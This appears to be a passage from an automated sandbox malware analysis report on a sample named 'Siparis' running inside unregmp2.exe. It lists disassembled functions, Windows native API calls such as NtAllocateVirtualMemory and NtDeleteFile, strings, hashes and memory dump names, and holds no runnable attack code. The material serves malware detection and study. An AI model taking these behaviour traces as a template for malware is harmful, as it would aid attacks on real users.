Instruction Fuzzy Hash: A421537AA00159ABDB11DF6AD840EEF7BF8EF54654F04012BEA45E3254E770DA018BA1

Function 013EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0143031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014302BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014302E7

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 0dec0c2cc9e1186a060669f138afb97ec1213b4cabaf0053bb922146912312c7
Instruction ID: 6ca152ccd52ee4e4fd5c54f91b811d948355a05083f8ff9fbbe41bf169be5076
Opcode Fuzzy Hash: 0dec0c2cc9e1186a060669f138afb97ec1213b4cabaf0053bb922146912312c7
Instruction Fuzzy Hash: 49E1A1306047519FE725CF28C888B2ABBE4BB88328F140A5EF5958B7E1D7B5D945CB42

Function 013FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01437BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01437B7F
RTL: Resource at %p, xrefs: 01437B8E

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: e95c1e423d56ba8b690dc30749ebc9e8938bae4ab17fee4e0628d80bae91ea5b
Instruction ID: fbaa162d920293532e7ef6232d947aff867dc63902536ff5206c91e6af927d59
Opcode Fuzzy Hash: e95c1e423d56ba8b690dc30749ebc9e8938bae4ab17fee4e0628d80bae91ea5b
Instruction Fuzzy Hash: CE4103717007028FD725CE29CC40B6BB7E5EF98715F100A2EEA9A9B790DB31E4098B91

Function 013FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0143728C

Strings

RTL: Re-Waiting, xrefs: 014372C1
RTL: Resource at %p, xrefs: 014372A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01437294

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: aa813729ae26e480f27e7ef5369d9ff8d94baa68479ce467fb3d1a224a9d121f
Instruction ID: 604d8b4dc88ea2e04835f84dd9f4ee08044e965b61c8c802c1ffa3793888e98a
Opcode Fuzzy Hash: aa813729ae26e480f27e7ef5369d9ff8d94baa68479ce467fb3d1a224a9d121f
Instruction Fuzzy Hash: 304105B1700206ABD711CF29CC41F66B7A5FB98715F10061EFA95AB790DB31E8468BD1

Function 01472300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0147238D
___swprintf_l.LIBCMT ref: 014723B3

Strings

%%%u, xrefs: 01472384
]:%u, xrefs: 014723AA

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 2d324ad1931e1c0c8bad28c9b38e2ac903e5872258b9ab59fde84011dc7cf88e
Instruction ID: 6aa3049c0757e886897209ddb9be2cf7fd8f03ff938b60b6b9f67dd3cc361c44
Opcode Fuzzy Hash: 2d324ad1931e1c0c8bad28c9b38e2ac903e5872258b9ab59fde84011dc7cf88e
Instruction Fuzzy Hash: 3E315272A002299FDB60DF39DC40FEFB7B8EB54614F44455AE949E3250EB70AA458BA0

Function 01407D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01407E8B

Strings

-, xrefs: 01407DDD
+, xrefs: 01407DE8

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: aeedf965bfa74229ea473a4f71cae366d193c0645b771589983cbcd5cb05b547
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: F291C470E002069ADB26DF6FC8906BFBBA5AF44322F14453FE995A73E0D730AD418752

Function 013C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 013C9175
$, xrefs: 013C9191

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: fcac658b984ada1489a73dd7d43fea15a76df4e45b7efe8a35d2f3395b8f6ce8
Instruction ID: f7c1838f3a699836aeeeb315a002529005520859321a142c3b2ff635a95d96d3
Opcode Fuzzy Hash: fcac658b984ada1489a73dd7d43fea15a76df4e45b7efe8a35d2f3395b8f6ce8
Instruction Fuzzy Hash: E1811B72D002699BDB35CB54CC45BEABBB8AB48714F0141EAEA19B7290D7705E85CFA0

Function 0144CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0144CFBD

Strings

@4Qw@4Qw, xrefs: 0144CFD5, 0144CFDA, 0144CFF1
@, xrefs: 0144CF0A

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Qw@4Qw
API String ID: 4062629308-2383119779
Opcode ID: ddb8492f2dc8c00b4efb6c60d8a4e09d014f7935c763903f131437ffe882a591
Instruction ID: 2efa8462beb34bcf8e0e66ee2e08bae20434a5369a4586ebdc513e4b77015727
Opcode Fuzzy Hash: ddb8492f2dc8c00b4efb6c60d8a4e09d014f7935c763903f131437ffe882a591
Instruction Fuzzy Hash: D341A1B2D00215DFDB21DFAAD880AAEBBB8FF65718F14402BE905DB264D7348801CB65

Analysis Process: unregmp2.exePID: 7356, Parent PID: 6720COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	4.3%
Signature Coverage:	1.6%
Total number of Nodes:	441
Total number of Limit Nodes:	72

Executed Functions

Function 0042BE00 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 0042BEE4
FindNextFileW.KERNELBASE(?,00000010), ref: 0042BF1F
FindClose.KERNELBASE(?), ref: 0042BF2A

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: bb53c66e9415eef9ed8cfac4a92c5182dcff2baf30a16be2c8494ab4df996999
Instruction ID: 02f9246eae6746dadbf537cecd222bc94e04bb8211175ce6217098c7bef778c1
Opcode Fuzzy Hash: bb53c66e9415eef9ed8cfac4a92c5182dcff2baf30a16be2c8494ab4df996999
Instruction Fuzzy Hash: ED319275A00218BBEB20DB61DC85FFB777CDF44748F14449EB909A7190DBB4AE848BA4

Function 00437D00 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00437DF3

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ecfe109843e6adbc9789653d124c6213f17cb6b4317e9cde925e34fe65ab8720
Instruction ID: da2e82e75cd2bb6f0e677ac61dfb0f8cff15757a8847ba9df90c74a5e41983b3
Opcode Fuzzy Hash: ecfe109843e6adbc9789653d124c6213f17cb6b4317e9cde925e34fe65ab8720
Instruction Fuzzy Hash: 6131E2B5A01209AFCB14DF99D881EEFB7F9AF8C314F10811AF919A3341D674A951CBA4

Function 00437E60 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00437F38

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 4b475c96b3670da1695345ff90d445bc7f9a6db3ada86ecf4cb7af92aad584dd
Instruction ID: 4e1a370285727766d82c4ef9343752c351db18f69d5ab6e08530dc532be6e052
Opcode Fuzzy Hash: 4b475c96b3670da1695345ff90d445bc7f9a6db3ada86ecf4cb7af92aad584dd
Instruction Fuzzy Hash: C031EAB5A00209AFDB14DF59D881EEFB7B9EF8C314F10811AFD19A7241D674A811CBA4

Function 00438140 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(0042199E,?,?,00000000,00000004,00003000,?,?,?,?,?,?,0042199E,?,00000000), ref: 004381FD

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 4c0ce185ad5d200ae9320498b354b4f0915c368f0ac16ab7953bcb79e85fabda
Instruction ID: 28d21281ea7c1d8cf4437aa8f1f34f2fa125bddb873004ec74d0a1cc30a0b3ab
Opcode Fuzzy Hash: 4c0ce185ad5d200ae9320498b354b4f0915c368f0ac16ab7953bcb79e85fabda
Instruction Fuzzy Hash: 752124B5A00208ABDB14EF59DC81EEBB7B9EF88714F00850EFD08A7241D674A811CBA5

Function 00437F40 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 00437FCB

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 8f29438b34e29164e242ffc256c12d18e8e931696d74641c76c59d00643db24c
Instruction ID: bf61e927e1830f0339a25a98ad038de9d44089e21e38016192a4219831885057
Opcode Fuzzy Hash: 8f29438b34e29164e242ffc256c12d18e8e931696d74641c76c59d00643db24c
Instruction Fuzzy Hash: 9F018E31A012047FD624EB65DC02FEB77ACDF89714F40440EFA099B142DAB579008BE9

Function 00437FE0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00438017

Memory Dump Source

Source File: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_unregmp2.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 024f7506f13a32ece6b1676215f5119d665d863506ea31102a3387a4627870a5
Instruction ID: bea673ed3534d225e8c183753f81187e85bab6b4717b728b47c5aa0e23082f37
Opcode Fuzzy Hash: 024f7506f13a32ece6b1676215f5119d665d863506ea31102a3387a4627870a5
Instruction Fuzzy Hash: 4BE046326012447BE220EA5ADC01FEBB7ACDBC5724F41841AFA0CA7242CA71B91186E4

Function 04574650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0457465A

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c04cd1afecf7e5dfe57390f167ad771d3f6b82c972f8840e1e091d0020e462dc
Instruction ID: 5e34c0c3218b93c9160cab529685a1c2fa6c3e2d9c0e8e8d9ab224c24b262c51
Opcode Fuzzy Hash: c04cd1afecf7e5dfe57390f167ad771d3f6b82c972f8840e1e091d0020e462dc
Instruction Fuzzy Hash: A4900261601500436140725848444066046EBE13153D9C119A0556564C8A18D955A269

Function 04574340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0457434A

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2e4c1aae3c831a4e87ca490be012ac9a96f37aebbe3ac204066a5af4835dbdbc
Instruction ID: 59baef5616e5236e11b3291b84227d9989e2b64afb8c4f19976d4fced3670890
Opcode Fuzzy Hash: 2e4c1aae3c831a4e87ca490be012ac9a96f37aebbe3ac204066a5af4835dbdbc
Instruction Fuzzy Hash: 4A90023160580013B140725848C45464046EBE0315B99C015E0426558C8E14DA566361

Function 04572C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572C7A

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9617a64c3a44c3129b0c6a5156a47d58460cc9eab752501340d434e3564a207b
Instruction ID: b77c240791dfbcf4c8dce1fc3d34b6ca1660da48416f5da25c55bb690b57431c
Opcode Fuzzy Hash: 9617a64c3a44c3129b0c6a5156a47d58460cc9eab752501340d434e3564a207b
Instruction Fuzzy Hash: 6890023120148803F1107258844474A0046DBD0315F9DC415A442665CD8A95D9917121

Function 04572C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572C6A

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 23d6c564edf4530ee707dff78c1952d991012c8a9e4f6d57dadfb5921e908539
Instruction ID: 6f1340157699499042e3caf09f86b0744f987d37d212e1aa37c253422dc0637c
Opcode Fuzzy Hash: 23d6c564edf4530ee707dff78c1952d991012c8a9e4f6d57dadfb5921e908539
Instruction Fuzzy Hash: 1890023120140843F10072584444B460046DBE0315F99C01AA0126658D8A15D9517521

Function 04572CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572CAA

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 98e32c0b634f7461c8a3925b82416bab56c22d0e02355242bcf45b88e71923d8
Instruction ID: 5320c2c2568f97d318c2be28dbd7379b1927b0328fccaf844258f53f8fb3acc0
Opcode Fuzzy Hash: 98e32c0b634f7461c8a3925b82416bab56c22d0e02355242bcf45b88e71923d8
Instruction Fuzzy Hash: D490023120140403F100769854486460046DBE0315F99D015A5026559ECA65D9917131

Function 04572D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572D1A

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a8c00eef7a98173a07ffe68cee89aa88d9eaa700bfd012d1892dade6d9ebf79c
Instruction ID: 324aa4b043dd6bbb8eb5ff274dcb22ae4ec567cdac1e5c38a515ab45fc58cca9
Opcode Fuzzy Hash: a8c00eef7a98173a07ffe68cee89aa88d9eaa700bfd012d1892dade6d9ebf79c
Instruction Fuzzy Hash: FB90022921340003F1807258544860A0046DBD1316FD9D419A001755CCCD15D9696321

Function 04572D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572D3A

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9f64c3dd37ae1b70c1d458ed7a5f8a0fc5fc3646a914ce4f92e583b1cc95c15f
Instruction ID: a94ae09299e6f5d2793d890bad49d78a9bca5753598b4c70ab66d0f99d1fad27
Opcode Fuzzy Hash: 9f64c3dd37ae1b70c1d458ed7a5f8a0fc5fc3646a914ce4f92e583b1cc95c15f
Instruction Fuzzy Hash: 8B90022130140003F140725854586064046EBE1315F99D015E0416558CDD15D9566222

Function 04572DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572DDA

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c65f9956262ab621f146e89591301c11395836b97d5bbab50d2538d1d8a0741
Instruction ID: 8d12b4ba8bba591bd6412439ff815c086f9114559be3131758fc156fd21e2f08
Opcode Fuzzy Hash: 9c65f9956262ab621f146e89591301c11395836b97d5bbab50d2538d1d8a0741
Instruction Fuzzy Hash: FC900221242441537545B25844445074047EBE03557D9C016A1416954C8926E956E621

Function 04572DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572DFA

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ecfa56e2cc8e0fd1fd1e803b030fe2f4c95b97566dc91e29e4e1a05bfa24da60
Instruction ID: 125c068bc5e13e5d969152cc39d56d1fa988c0bcb19a1769382139c782ae756e
Opcode Fuzzy Hash: ecfa56e2cc8e0fd1fd1e803b030fe2f4c95b97566dc91e29e4e1a05bfa24da60
Instruction Fuzzy Hash: 0190023120140413F11172584544707004ADBD0355FD9C416A042655CD9A56DA52B121

Function 04572EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572EEA

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9a68bfc2722cb6e80cb3d6fc97f08adef3f5f9726a7e1487d85846485add674c
Instruction ID: 4a701c59006bf8bb0181a0a44c15c68be72e48dbc8578329ea09169f7bf84f61
Opcode Fuzzy Hash: 9a68bfc2722cb6e80cb3d6fc97f08adef3f5f9726a7e1487d85846485add674c
Instruction Fuzzy Hash: ED90026120180403F140765848446070046DBD0316F99C015A2066559E8E29DD517135

Function 04572E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572E8A

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c8470c61295bf54ab4c2023063c0e0eff502364d709ad677a68a698c281b1222
Instruction ID: bb091c489a7f1cd4c3d7591414b1c4d5c05e7899c9ca0fe9dfd75865c3892c3c
Opcode Fuzzy Hash: c8470c61295bf54ab4c2023063c0e0eff502364d709ad677a68a698c281b1222
Instruction Fuzzy Hash: 2690022160140503F10172584444616004BDBD0355FD9C026A1026559ECE25DA92B131

Function 04572F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572F3A

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f91eafd23f620a9db2185223f5ce9b75671cc40b1be61c55e1a61e206df7e76
Instruction ID: 7f1c8ea2bc0c16554733dcefcace6bb549235c4bdf6a1cde40e8e0c148b0decd
Opcode Fuzzy Hash: 4f91eafd23f620a9db2185223f5ce9b75671cc40b1be61c55e1a61e206df7e76
Instruction Fuzzy Hash: 0890026134140443F10072584454B060046DBE1315F99C019E1066558D8A19DD527126

Function 04572FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572FEA

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a9f60fc699c95ae278bcc3b2198d4b7a9ca64ef32e0fdc4371685414d8c09e99
Instruction ID: 5f513675920af6e921e3a8fe434457f6698576d6f6704106104564c962f45178
Opcode Fuzzy Hash: a9f60fc699c95ae278bcc3b2198d4b7a9ca64ef32e0fdc4371685414d8c09e99
Instruction Fuzzy Hash: 29900221211C0043F20076684C54B070046DBD0317F99C119A0156558CCD15D9616521

Function 04572FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04572FBA

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
